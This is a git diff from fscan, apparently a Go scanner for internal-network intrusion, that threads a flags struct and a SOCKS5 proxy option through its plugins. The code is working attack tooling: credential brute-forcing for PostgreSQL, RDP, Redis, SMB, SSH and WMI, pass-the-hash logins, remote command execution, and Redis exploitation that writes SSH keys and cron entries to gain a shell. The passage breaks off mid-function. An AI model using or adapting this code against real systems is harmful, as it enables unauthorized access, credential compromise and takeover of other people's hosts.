common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), socks5Proxy, time.Duration(adjustedTimeout)*time.Second) defer func() { if conn != nil { conn.Close() @@ -92,9 +92,9 @@ func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64 } } -func NoPortScan(hostslist []string, ports string) (AliveAddress []string) { +func NoPortScan(hostslist []string, ports string, flags common.Flags) (AliveAddress []string) { probePorts := common.ParsePort(ports) - noPorts := common.ParsePort(common.NoPorts) + noPorts := common.ParsePort(flags.NoPorts) if len(noPorts) > 0 { temp := map[int]struct{}{} for _, port := range probePorts { diff --git a/Plugins/postgres.go b/Plugins/postgres.go index f52ca68..6ffc8a4 100644 --- a/Plugins/postgres.go +++ b/Plugins/postgres.go @@ -3,21 +3,22 @@ package Plugins import ( "database/sql" "fmt" - _ "github.com/lib/pq" - "github.com/shadow1ng/fscan/common" "strings" "time" + + _ "github.com/lib/pq" + "github.com/shadow1ng/fscan/common" ) -func PostgresScan(info *common.HostInfo) (tmperr error) { - if common.IsBrute { +func PostgresScan(info common.HostInfo, flags common.Flags) (tmperr error) { + if flags.IsBrute { return } starttime := time.Now().Unix() for _, user := range common.Userdict["postgresql"] { for _, pass := range common.Passwords { pass = strings.Replace(pass, "{user}", string(user), -1) - flag, err := PostgresConn(info, user, pass) + flag, err := PostgresConn(info, user, pass, flags.Timeout) if flag && err == nil { return err } else { @@ -27,7 +28,7 @@ func PostgresScan(info *common.HostInfo) (tmperr error) { if common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * flags.Timeout) { return err } } @@ -36,13 +37,13 @@ func PostgresScan(info *common.HostInfo) (tmperr error) { return tmperr } -func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, err error) { +func PostgresConn(info common.HostInfo, user string, pass string, timeout int64) (flag bool, err error) { flag = false Host, Port, Username, Password := info.Host, info.Ports, user, pass dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable") db, err := sql.Open("postgres", dataSourceName) if err == nil { - db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) + db.SetConnMaxLifetime(time.Duration(timeout) * time.Second) defer db.Close() err = db.Ping() if err == nil { diff --git a/Plugins/rdp.go b/Plugins/rdp.go index 2754a9a..694d295 100644 --- a/Plugins/rdp.go +++ b/Plugins/rdp.go @@ -3,6 +3,13 @@ package Plugins import ( "errors" "fmt" + "log" + "os" + "strconv" + "strings" + "sync" + "time" + "github.com/shadow1ng/fscan/common" "github.com/tomatome/grdp/core" "github.com/tomatome/grdp/glog" @@ -13,12 +20,6 @@ import ( "github.com/tomatome/grdp/protocol/t125" "github.com/tomatome/grdp/protocol/tpkt" "github.com/tomatome/grdp/protocol/x224" - "log" - "os" - "strconv" - "strings" - "sync" - "time" ) type Brutelist struct { @@ -26,11 +27,13 @@ type Brutelist struct { pass string } -func RdpScan(info *common.HostInfo) (tmperr error) { - if common.IsBrute { +var sock5Proxy common.Socks5 = common.Socks5{Address: ""} + +func RdpScan(info common.HostInfo, flags common.Flags) (tmperr error) { + if flags.IsBrute { return } - + sock5Proxy = common.Socks5{Address: flags.Socks5Proxy} var wg sync.WaitGroup var signal bool var num = 0 @@ -46,9 +49,9 @@ func RdpScan(info *common.HostInfo) (tmperr error) { } } - for i := 0; i < common.BruteThread; i++ { + for i := 0; i < flags.BruteThread; i++ { wg.Add(1) - go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout) + go worker(info.Host, flags.Domain, port, &wg, brlist, &signal, &num, all, &mutex, flags.Timeout) } close(brlist) @@ -107,13 +110,14 @@ func RdpConn(ip, domain, user, password string, port int, timeout int64) (bool, } type Client struct { - Host string // ip:port - tpkt *tpkt.TPKT - x224 *x224.X224 - mcs *t125.MCSClient - sec *sec.Client - pdu *pdu.Client - vnc *rfb.RFB + Host string // ip:port + proxy common.Socks5 + tpkt *tpkt.TPKT + x224 *x224.X224 + mcs *t125.MCSClient + sec *sec.Client + pdu *pdu.Client + vnc *rfb.RFB } func NewClient(host string, logLevel glog.LEVEL) *Client { @@ -125,8 +129,12 @@ func NewClient(host string, logLevel glog.LEVEL) *Client { } } +func (g *Client) setProxy(proxy common.Socks5) { + g.proxy = proxy +} + func (g *Client) Login(domain, user, pwd string, timeout int64) error { - conn, err := common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second) + conn, err := common.WrapperTcpWithTimeout("tcp", g.Host, sock5Proxy, time.Duration(timeout)*time.Second) defer func() { if conn != nil { conn.Close() diff --git a/Plugins/redis.go b/Plugins/redis.go index c0915c9..cc77786 100644 --- a/Plugins/redis.go +++ b/Plugins/redis.go @@ -3,11 +3,12 @@ package Plugins import ( "bufio" "fmt" - "github.com/shadow1ng/fscan/common" "net" "os" "strings" "time" + + "github.com/shadow1ng/fscan/common" ) var ( @@ -15,18 +16,18 @@ var ( dir string ) -func RedisScan(info *common.HostInfo) (tmperr error) { +func RedisScan(info *common.HostInfo, flags common.Flags) (tmperr error) { starttime := time.Now().Unix() - flag, err := RedisUnauth(info) + flag, err := RedisUnauth(info, flags) if flag && err == nil { return err } - if common.IsBrute { + if flags.IsBrute { return } for _, pass := range common.Passwords { pass = strings.Replace(pass, "{user}", "redis", -1) - flag, err := RedisConn(info, pass) + flag, err := RedisConn(info, flags, pass) if flag && err == nil { return err } else { @@ -36,7 +37,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) { if common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * flags.Timeout) { return err } } @@ -44,10 +45,10 @@ func RedisScan(info *common.HostInfo) (tmperr error) { return tmperr } -func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) { +func RedisConn(info *common.HostInfo, flags common.Flags, pass string) (flag bool, err error) { flag = false realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) - conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err := common.WrapperTcpWithTimeout("tcp", realhost, common.Socks5{Address: flags.Socks5Proxy}, time.Duration(flags.Timeout)*time.Second) defer func() { if conn != nil { conn.Close() @@ -56,7 +57,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) { if err != nil { return flag, err } - err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetReadDeadline(time.Now().Add(time.Duration(flags.Timeout) * time.Second)) if err != nil { return flag, err } @@ -79,15 +80,15 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) { result := fmt.Sprintf("[+] Redis:%s %s file:%s/%s", realhost, pass, dir, dbfilename) common.LogSuccess(result) } - err = Expoilt(realhost, conn) + err = Expoilt(realhost, conn, flags.RedisShell) } return flag, err } -func RedisUnauth(info *common.HostInfo) (flag bool, err error) { +func RedisUnauth(info *common.HostInfo, flags common.Flags) (flag bool, err error) { flag = false realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) - conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err := common.WrapperTcpWithTimeout("tcp", realhost, common.Socks5{Address: flags.Socks5Proxy}, time.Duration(flags.Timeout)*time.Second) defer func() { if conn != nil { conn.Close() @@ -96,7 +97,7 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) { if err != nil { return flag, err } - err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetReadDeadline(time.Now().Add(time.Duration(flags.Timeout) * time.Second)) if err != nil { return flag, err } @@ -119,12 +120,12 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) { result := fmt.Sprintf("[+] Redis:%s unauthorized file:%s/%s", realhost, dir, dbfilename) common.LogSuccess(result) } - err = Expoilt(realhost, conn) + err = Expoilt(realhost, conn, flags.RedisShell) } return flag, err } -func Expoilt(realhost string, conn net.Conn) error { +func Expoilt(realhost string, conn net.Conn, redisShell string) error { flagSsh, flagCron, err := testwrite(conn) if err != nil { return err @@ -132,8 +133,8 @@ func Expoilt(realhost string, conn net.Conn) error { if flagSsh { result := fmt.Sprintf("[+] Redis:%v like can write /root/.ssh/", realhost) common.LogSuccess(result) - if common.RedisFile != "" { - writeok, text, err := writekey(conn, common.RedisFile) + if redisShell != "" { + writeok, text, err := writekey(conn, redisShell) if err != nil { fmt.Printf("[-] %s SSH write key errer: %s", realhost, text) return err @@ -150,8 +151,8 @@ func Expoilt(realhost string, conn net.Conn) error { if flagCron { result := fmt.Sprintf("[+] Redis:%v like can write /var/spool/cron/", realhost) common.LogSuccess(result) - if common.RedisShell != "" { - writeok, text, err := writecron(conn, common.RedisShell) + if redisShell != "" { + writeok, text, err := writecron(conn, redisShell) if err != nil { return err } @@ -376,7 +377,7 @@ func recoverdb(dbfilename string, dir string, conn net.Conn) (err error) { if err != nil { return } - + if _, err = readreply(conn); err != nil { return } @@ -384,7 +385,7 @@ func recoverdb(dbfilename string, dir string, conn net.Conn) (err error) { if err != nil { return } - + if _, err = readreply(conn); err != nil { return } diff --git a/Plugins/scanner.go b/Plugins/scanner.go index 5ebcce1..68e4eda 100644 --- a/Plugins/scanner.go +++ b/Plugins/scanner.go @@ -11,46 +11,46 @@ import ( "github.com/shadow1ng/fscan/common" ) -func Scan(info common.HostInfo) { +func Scan(info common.HostInfo, flags common.Flags) { fmt.Println("start infoscan") - Hosts, err := common.ParseIP(info.Host, common.HostFile, common.NoHosts) + Hosts, err := common.ParseIP(&info.HostPort, info.Host, flags.HostFile, flags.NoHosts) if err != nil { fmt.Println("len(hosts)==0", err) return } - lib.Inithttp(common.Pocinfo) - var ch = make(chan struct{}, common.Threads) + lib.Inithttp(flags) + var ch = make(chan struct{}, flags.Threads) var wg = sync.WaitGroup{} web := strconv.Itoa(common.PORTList["web"]) ms17010 := strconv.Itoa(common.PORTList["ms17010"]) - if len(Hosts) > 0 || len(common.HostPort) > 0 { - if !common.NoPing && len(Hosts) > 0 { - Hosts = CheckLive(Hosts, common.Ping) + if len(Hosts) > 0 || len(info.HostPort) > 0 { + if !flags.NoPing && len(Hosts) > 0 { + Hosts = CheckLive(Hosts, flags.Ping, flags.LiveTop) fmt.Println("[*] Icmp alive hosts len is:", len(Hosts)) } - if common.Scantype == "icmp" { + if flags.Scantype == "icmp" { common.LogWG.Wait() return } var AlivePorts []string - if common.Scantype == "webonly" || common.Scantype == "webpoc" { - AlivePorts = NoPortScan(Hosts, info.Ports) - } else if common.Scantype == "hostname" { + if flags.Scantype == "webonly" || flags.Scantype == "webpoc" { + AlivePorts = NoPortScan(Hosts, info.Ports, flags) + } else if flags.Scantype == "hostname" { info.Ports = "139" - AlivePorts = NoPortScan(Hosts, info.Ports) + AlivePorts = NoPortScan(Hosts, info.Ports, flags) } else if len(Hosts) > 0 { - AlivePorts = PortScan(Hosts, info.Ports, common.Timeout) + AlivePorts = PortScan(Hosts, info.Ports, flags) fmt.Println("[*] alive ports len is:", len(AlivePorts)) - if common.Scantype == "portscan" { + if flags.Scantype == "portscan" { common.LogWG.Wait() return } } - if len(common.HostPort) > 0 { - AlivePorts = append(AlivePorts, common.HostPort...) + if len(info.HostPort) > 0 { + AlivePorts = append(AlivePorts, info.HostPort...) AlivePorts = common.RemoveDuplicate(AlivePorts) - common.HostPort = nil + info.HostPort = nil fmt.Println("[*] AlivePorts len is:", len(AlivePorts)) } @@ -61,35 +61,35 @@ func Scan(info common.HostInfo) { fmt.Println("start vulscan") for _, targetIP := range AlivePorts { info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1] - if common.Scantype == "all" || common.Scantype == "main" { + if flags.Scantype == "all" || flags.Scantype == "main" { switch { case info.Ports == "135": - AddScan(info.Ports, info, &ch, &wg) //findnet - if common.IsWmi { - AddScan("1000005", info, &ch, &wg) //wmiexec + AddScan(info.Ports, info, flags, &ch, &wg) //findnet + if flags.IsWmi { + AddScan("1000005", info, flags, &ch, &wg) //wmiexec } case info.Ports == "445": - AddScan(ms17010, info, &ch, &wg) //ms17010 + AddScan(ms17010, info, flags, &ch, &wg) //ms17010 //AddScan(info.Ports, info, ch, &wg) //smb //AddScan("1000002", info, ch, &wg) //smbghost case info.Ports == "9000": - AddScan(web, info, &ch, &wg) //http - AddScan(info.Ports, info, &ch, &wg) //fcgiscan + AddScan(web, info, flags, &ch, &wg) //http + AddScan(info.Ports, info, flags, &ch, &wg) //fcgiscan case IsContain(severports, info.Ports): - AddScan(info.Ports, info, &ch, &wg) //plugins scan + AddScan(info.Ports, info, flags, &ch, &wg) //plugins scan default: - AddScan(web, info, &ch, &wg) //webtitle + AddScan(web, info, flags, &ch, &wg) //webtitle } } else { - scantype := strconv.Itoa(common.PORTList[common.Scantype]) - AddScan(scantype, info, &ch, &wg) + scantype := strconv.Itoa(common.PORTList[flags.Scantype]) + AddScan(scantype, info, flags, &ch, &wg) } } } - for _, url := range common.Urls { + for _, url := range flags.Urls { info.Url = url - AddScan(web, info, &ch, &wg) + AddScan(web, info, flags, &ch, &wg) } wg.Wait() @@ -101,14 +101,14 @@ func Scan(info common.HostInfo) { var Mutex = &sync.Mutex{} -func AddScan(scantype string, info common.HostInfo, ch *chan struct{}, wg *sync.WaitGroup) { +func AddScan(scantype string, info common.HostInfo, flags common.Flags, ch *chan struct{}, wg *sync.WaitGroup) { *ch <- struct{}{} wg.Add(1) go func() { Mutex.Lock() common.Num += 1 Mutex.Unlock() - ScanFunc(&scantype, &info) + ScanFunc(scantype, info, flags) Mutex.Lock() common.End += 1 Mutex.Unlock() @@ -117,9 +117,9 @@ func AddScan(scantype string, info common.HostInfo, ch *chan struct{}, wg *sync. }() } -func ScanFunc(name *string, info *common.HostInfo) { - f := reflect.ValueOf(PluginList[*name]) - in := []reflect.Value{reflect.ValueOf(info)} +func ScanFunc(name string, info common.HostInfo, flags common.Flags) { + f := reflect.ValueOf(PluginList[name]) + in := []reflect.Value{reflect.ValueOf(info), reflect.ValueOf(flags)} f.Call(in) } diff --git a/Plugins/smb.go b/Plugins/smb.go index 9b6b835..69f1b61 100644 --- a/Plugins/smb.go +++ b/Plugins/smb.go @@ -3,25 +3,26 @@ package Plugins import ( "errors" "fmt" - "github.com/shadow1ng/fscan/common" - "github.com/stacktitan/smb/smb" "strings" "time" + + "github.com/shadow1ng/fscan/common" + "github.com/stacktitan/smb/smb" ) -func SmbScan(info *common.HostInfo) (tmperr error) { - if common.IsBrute { +func SmbScan(info common.HostInfo, flags common.Flags) (tmperr error) { + if flags.IsBrute { return nil } starttime := time.Now().Unix() for _, user := range common.Userdict["smb"] { for _, pass := range common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) - flag, err := doWithTimeOut(info, user, pass) + flag, err := doWithTimeOut(info, flags, user, pass) if flag && err == nil { var result string - if common.Domain != "" { - result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, common.Domain, user, pass) + if flags.Domain != "" { + result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, flags.Domain, user, pass) } else { result = fmt.Sprintf("[+] SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass) } @@ -35,7 +36,7 @@ func SmbScan(info *common.HostInfo) (tmperr error) { if common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * flags.Timeout) { return err } } @@ -44,7 +45,7 @@ func SmbScan(info *common.HostInfo) (tmperr error) { return tmperr } -func SmblConn(info *common.HostInfo, user string, pass string, signal chan struct{}) (flag bool, err error) { +func SmblConn(info common.HostInfo, flags common.Flags, user string, pass string, signal chan struct{}) (flag bool, err error) { flag = false Host, Username, Password := info.Host, user, pass options := smb.Options{ @@ -52,7 +53,7 @@ func SmblConn(info *common.HostInfo, user string, pass string, signal chan struc Port: 445, User: Username, Password: Password, - Domain: common.Domain, + Domain: flags.Domain, Workstation: "", } @@ -67,15 +68,15 @@ func SmblConn(info *common.HostInfo, user string, pass string, signal chan struc return flag, err } -func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool, err error) { +func doWithTimeOut(info common.HostInfo, flags common.Flags, user string, pass string) (flag bool, err error) { signal := make(chan struct{}) go func() { - flag, err = SmblConn(info, user, pass, signal) + flag, err = SmblConn(info, flags, user, pass, signal) }() select { case <-signal: return flag, err - case <-time.After(time.Duration(common.Timeout) * time.Second): + case <-time.After(time.Duration(flags.Timeout) * time.Second): return false, errors.New("time out") } } diff --git a/Plugins/smb2.go b/Plugins/smb2.go index 2adeaec..c3c6747 100644 --- a/Plugins/smb2.go +++ b/Plugins/smb2.go @@ -2,39 +2,40 @@ package Plugins import ( "fmt" - "github.com/shadow1ng/fscan/common" "net" "os" "strings" "time" + "github.com/shadow1ng/fscan/common" + "github.com/hirochachacha/go-smb2" ) -func SmbScan2(info *common.HostInfo) (tmperr error) { - if common.IsBrute { +func SmbScan2(info common.HostInfo, flags common.Flags) (tmperr error) { + if flags.IsBrute { return nil } hasprint := false starttime := time.Now().Unix() - hash := common.HashBytes + hash := flags.HashBytes for _, user := range common.Userdict["smb"] { PASS: for _, pass := range common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) - flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint) + flag, err, flag2 := Smb2Con(info, flags, user, pass, hash, hasprint) if flag2 { hasprint = true } if flag { var result string - if common.Domain != "" { - result = fmt.Sprintf("[+] SMB2:%v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user) + if flags.Domain != "" { + result = fmt.Sprintf("[+] SMB2:%v:%v:%v\\%v ", info.Host, info.Ports, flags.Domain, user) } else { result = fmt.Sprintf("[+] SMB2:%v:%v:%v ", info.Host, info.Ports, user) } if len(hash) > 0 { - result += "hash: " + common.Hash + result += "hash: " + flags.Hash } else { result += pass } @@ -42,8 +43,8 @@ func SmbScan2(info *common.HostInfo) (tmperr error) { return err } else { var errlog string - if len(common.Hash) > 0 { - errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err) + if len(flags.Hash) > 0 { + errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, flags.Hash, err) } else { errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err) } @@ -53,11 +54,11 @@ func SmbScan2(info *common.HostInfo) (tmperr error) { if common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * flags.Timeout) { return err } } - if len(common.Hash) > 0 { + if len(flags.Hash) > 0 { break PASS } } @@ -65,8 +66,8 @@ func SmbScan2(info *common.HostInfo) (tmperr error) { return tmperr } -func Smb2Con(info *common.HostInfo, user string, pass string, hash []byte, hasprint bool) (flag bool, err error, flag2 bool) { - conn, err := net.DialTimeout("tcp", info.Host+":445", time.Duration(common.Timeout)*time.Second) +func Smb2Con(info common.HostInfo, flags common.Flags, user string, pass string, hash []byte, hasprint bool) (flag bool, err error, flag2 bool) { + conn, err := net.DialTimeout("tcp", info.Host+":445", time.Duration(flags.Timeout)*time.Second) defer func() { if conn != nil { conn.Close() @@ -77,7 +78,7 @@ func Smb2Con(info *common.HostInfo, user string, pass string, hash []byte, haspr } initiator := smb2.NTLMInitiator{ User: user, - Domain: common.Domain, + Domain: flags.Domain, } if len(hash) > 0 { initiator.Hash = hash @@ -99,13 +100,13 @@ func Smb2Con(info *common.HostInfo, user string, pass string, hash []byte, haspr } if !hasprint { var result string - if common.Domain != "" { - result = fmt.Sprintf("[*] SMB2-shares:%v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user) + if flags.Domain != "" { + result = fmt.Sprintf("[*] SMB2-shares:%v:%v:%v\\%v ", info.Host, info.Ports, flags.Domain, user) } else { result = fmt.Sprintf("[*] SMB2-shares:%v:%v:%v ", info.Host, info.Ports, user) } if len(hash) > 0 { - result += "hash: " + common.Hash + result += "hash: " + flags.Hash } else { result += pass } diff --git a/Plugins/ssh.go b/Plugins/ssh.go index e136952..e3ac75d 100644 --- a/Plugins/ssh.go +++ b/Plugins/ssh.go @@ -12,15 +12,15 @@ import ( "golang.org/x/crypto/ssh" ) -func SshScan(info *common.HostInfo) (tmperr error) { - if common.IsBrute { +func SshScan(info common.HostInfo, flags common.Flags) (tmperr error) { + if flags.IsBrute { return } starttime := time.Now().Unix() for _, user := range common.Userdict["ssh"] { for _, pass := range common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) - flag, err := SshConn(info, user, pass) + flag, err := SshConn(info, flags, user, pass) if flag && err == nil { return err } else { @@ -30,11 +30,11 @@ func SshScan(info *common.HostInfo) (tmperr error) { if common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * flags.Timeout) { return err } } - if common.SshKey != "" { + if flags.SshKey != "" { return err } } @@ -42,12 +42,12 @@ func SshScan(info *common.HostInfo) (tmperr error) { return tmperr } -func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err error) { +func SshConn(info common.HostInfo, flags common.Flags, user string, pass string) (flag bool, err error) { flag = false Host, Port, Username, Password := info.Host, info.Ports, user, pass var Auth []ssh.AuthMethod - if common.SshKey != "" { - pemBytes, err := os.ReadFile(common.SshKey) + if flags.SshKey != "" { + pemBytes, err := os.ReadFile(flags.SshKey) if err != nil { return false, errors.New("read key failed" + err.Error()) } @@ -63,7 +63,7 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er config := &ssh.ClientConfig{ User: Username, Auth: Auth, - Timeout: time.Duration(common.Timeout) * time.Second, + Timeout: time.Duration(flags.Timeout) * time.Second, HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error { return nil }, @@ -77,16 +77,16 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er defer session.Close() flag = true var result string - if common.Command != "" { - combo, _ := session.CombinedOutput(common.Command) + if flags.Command != "" { + combo, _ := session.CombinedOutput(flags.Command) result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo)) - if common.SshKey != "" { + if flags.SshKey != "" { result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct \n %v", Host, Port, string(combo)) } common.LogSuccess(result) } else { result = fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password) - if common.SshKey != "" { + if flags.SshKey != "" { result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct", Host, Port) } common.LogSuccess(result) diff --git a/Plugins/webtitle.go b/Plugins/webtitle.go index fe9b8f5..460e5c7 100644 --- a/Plugins/webtitle.go +++ b/Plugins/webtitle.go @@ -18,23 +18,23 @@ import ( "golang.org/x/text/encoding/simplifiedchinese" ) -func WebTitle(info *common.HostInfo) error { - if common.Scantype == "webpoc" { - WebScan.WebScan(info) +func WebTitle(info common.HostInfo, flags common.Flags) error { + if flags.Scantype == "webpoc" { + WebScan.WebScan(info, flags) return nil } - err, CheckData := GOWebTitle(info) + err, CheckData := GOWebTitle(info, flags) info.Infostr = WebScan.InfoCheck(info.Url, &CheckData) - if common.IsWebCan && err == nil { - WebScan.WebScan(info) + if flags.IsWebCan && err == nil { + WebScan.WebScan(info, flags) } else { errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err) common.LogError(errlog) } return err } -func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckDatas) { +func GOWebTitle(info common.HostInfo, flags common.Flags) (err error, CheckData []WebScan.CheckDatas) { if info.Url == "" { switch info.Ports { case "80": @@ -43,18 +43,18 @@ func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckData info.Url = fmt.Sprintf("https://%s", info.Host) default: host := fmt.Sprintf("%s:%s", info.Host, info.Ports) - protocol := GetProtocol(host, common.Timeout) + protocol := GetProtocol(host, common.Socks5{Address: flags.Socks5Proxy}, flags.Timeout) info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports) } } else { if !strings.Contains(info.Url, "://") { host := strings.Split(info.Url, "/")[0] - protocol := GetProtocol(host, common.Timeout) + protocol := GetProtocol(host, common.Socks5{Address: flags.Socks5Proxy}, flags.Timeout) info.Url = fmt.Sprintf("%s://%s", protocol, info.Url) } } - err, result, CheckData := geturl(info, 1, CheckData) + err, result, CheckData := geturl(info, flags, 1, CheckData) if err != nil && !strings.Contains(err.Error(), "EOF") { return } @@ -62,7 +62,7 @@ func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckData // there is a jump if strings.Contains(result, "://") { info.Url = result - err, result, CheckData = geturl(info, 3, CheckData) + err, result, CheckData = geturl(info, flags, 3, CheckData) if err != nil { return } @@ -70,11 +70,11 @@ func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckData if result == "https" && !strings.HasPrefix(info.Url, "https://") { info.Url = strings.Replace(info.Url, "http://", "https://", 1) - err, result, CheckData = geturl(info, 1, CheckData) + err, result, CheckData = geturl(info, flags, 1, CheckData) // there is a jump if strings.Contains(result, "://") { info.Url = result - err, _, CheckData = geturl(info, 3, CheckData) + err, _, CheckData = geturl(info, flags, 3, CheckData) if err != nil { return } @@ -87,7 +87,7 @@ func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckData return } -func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (error, string, []WebScan.CheckDatas) { +func geturl(info common.HostInfo, flags common.Flags, flag int, CheckData []WebScan.CheckDatas) (error, string, []WebScan.CheckDatas) { //flag 1 first try //flag 2 /favicon.ico //flag 3 302 @@ -210,7 +210,7 @@ func gettitle(body []byte) (title string) { return } -func GetProtocol(host string, Timeout int64) (protocol string) { +func GetProtocol(host string, proxy common.Socks5, Timeout int64) (protocol string) { if strings.HasSuffix(host, ":80") || !strings.Contains(host, ":") { return "http" } @@ -219,7 +219,7 @@ func GetProtocol(host string, Timeout int64) (protocol string) { return "https" } - socksconn, err := common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second) + socksconn, err := common.WrapperTcpWithTimeout("tcp", host, proxy, time.Duration(Timeout)*time.Second) if err != nil { return } diff --git a/Plugins/wmiexec.go b/Plugins/wmiexec.go index e7141e5..f60f230 100644 --- a/Plugins/wmiexec.go +++ b/Plugins/wmiexec.go @@ -27,8 +27,8 @@ func init() { flag = true } -func WmiExec(info *common.HostInfo) (tmperr error) { - if common.IsBrute { +func WmiExec(info *common.HostInfo, flags common.Flags) (tmperr error) { + if flags.IsBrute { return nil } starttime := time.Now().Unix() @@ -36,19 +36,19 @@ func WmiExec(info *common.HostInfo) (tmperr error) { PASS: for _, pass := range common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) - flag, err := Wmiexec(info, user, pass, common.Hash) + flag, err := Wmiexec(info, flags, user, pass) errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", info.Host, 445, user, pass, err) errlog = strings.Replace(errlog, "\n", "", -1) common.LogError(errlog) if flag { var result string - if common.Domain != "" { - result = fmt.Sprintf("[+] WmiExec:%v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user) + if flags.Domain != "" { + result = fmt.Sprintf("[+] WmiExec:%v:%v:%v\\%v ", info.Host, info.Ports, flags.Domain, user) } else { result = fmt.Sprintf("[+] WmiExec:%v:%v:%v ", info.Host, info.Ports, user) } - if common.Hash != "" { - result += "hash: " + common.Hash + if flags.Hash != "" { + result += "hash: " + flags.Hash } else { result += pass } @@ -59,11 +59,11 @@ func WmiExec(info *common.HostInfo) (tmperr error) { if common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * flags.Timeout) { return err } } - if len(common.Hash) == 32 { + if len(flags.Hash) == 32 { break PASS } } @@ -71,10 +71,10 @@ func WmiExec(info *common.HostInfo) (tmperr error) { return tmperr } -func Wmiexec(info *common.HostInfo, user string, pass string, hash string) (flag bool, err error) { +func Wmiexec(info *common.HostInfo, flags common.Flags, user string, pass string) (flag bool, err error) { target := fmt.Sprintf("%s:%v", info.Host, info.Ports) - wmiexec.Timeout = int(common.Timeout) - return WMIExec(target, user, pass, hash, common.Domain, common.Command, ClientHost, "", nil) + wmiexec.Timeout = int(flags.Timeout) + return WMIExec(target, user, pass, flags.Hash, flags.Domain, flags.Command, ClientHost, "", nil) } func WMIExec(target, username, password, hash, domain, command, clientHostname, binding string, cfgIn *wmiexec.WmiExecConfig) (flag bool, err error) { diff --git a/WebScan/WebScan.go b/WebScan/WebScan.go index 99bacd6..0a9452f 100644 --- a/WebScan/WebScan.go +++ b/WebScan/WebScan.go @@ -3,13 +3,14 @@ package WebScan import ( "embed" "fmt" - "github.com/shadow1ng/fscan/WebScan/lib" - "github.com/shadow1ng/fscan/common" "net/http" "os" "path/filepath" "strings" "sync" + + "github.com/shadow1ng/fscan/WebScan/lib" + "github.com/shadow1ng/fscan/common" ) //go:embed pocs @@ -17,23 +18,23 @@ var Pocs embed.FS var once sync.Once var AllPocs []*lib.Poc -func 